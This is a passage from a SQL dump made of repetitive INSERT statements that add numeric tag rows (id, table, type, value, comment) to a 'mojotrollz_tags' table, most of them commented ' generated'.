(8162, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8163, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8164, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8165, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8166, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8167, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8168, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8169, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8170, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8171, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8181, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8182, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8184, 4, 1, 309, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8184, 4, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8185, 4, 1, 309, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8185, 4, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8186, 4, 1, 309, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8186, 4, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8187, 4, 1, 309, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8187, 4, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8188, 4, 1, 309, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8188, 4, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8189, 4, 1, 309, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8189, 4, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8190, 4, 1, 309, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8190, 4, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8191, 4, 1, 309, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8191, 4, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8192, 4, 1, 309, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8192, 4, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8193, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8194, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8195, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8196, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8201, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8221, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8222, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8223, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8224, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8225, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8229, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8231, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8232, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8233, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8234, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8235, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8236, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8238, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8239, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8240, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8241, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8242, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8243, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8246, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8249, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8250, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8251, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8252, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8253, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8254, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8255, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8256, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8257, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8258, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8260, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8261, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8262, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8263, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8264, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8265, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8266, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8267, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8268, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8269, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8271, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8272, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8273, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8275, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8276, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8277, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8278, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8279, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8280, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8281, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8282, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8284, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8285, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8286, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8287, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8288, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8289, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8290, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8291, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8292, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8293, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8294, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8295, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8297, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8298, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8299, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8300, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8301, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8302, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8303, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8304, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8305, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8306, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8307, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8309, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8310, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8311, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8312, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8314, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8315, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8316, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8317, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8318, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8319, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8320, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8321, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8323, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8324, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8331, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8332, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8333, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8341, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8342, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8343, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8348, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8349, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8351, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8352, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8353, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8354, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8355, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8356, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8357, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8358, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8359, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8360, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8361, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8362, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8363, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8364, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8365, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8366, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8367, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8368, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8369, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8370, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8371, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8372, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8374, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8375, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8376, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8377, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8378, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8379, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8380, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8381, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8382, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8383, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8384, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8385, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8386, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8387, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8388, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8389, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8390, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8391, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8392, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8393, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8394, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8395, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8396, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8397, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8398, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8399, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8400, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8401, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8402, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8403, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8404, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8405, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8406, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8407, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8408, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8410, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8411, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8412, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8413, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8414, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8415, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8416, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8417, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8418, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8419, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8420, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8421, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8422, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8423, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8424, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8425, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8426, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8427, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8428, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8429, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8430, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8431, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8432, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8433, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8434, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8435, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8436, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8437, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8438, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8439, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8440, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8441, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8442, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8443, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8447, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8460, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8461, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8462, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8464, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8465, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8466, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8467, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8469, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8481, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8484, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8485, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8507, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8544, 4, 1, 531, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8544, 4, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8548, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8551, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8553, 4, 1, 0, ' generated'); INSERT 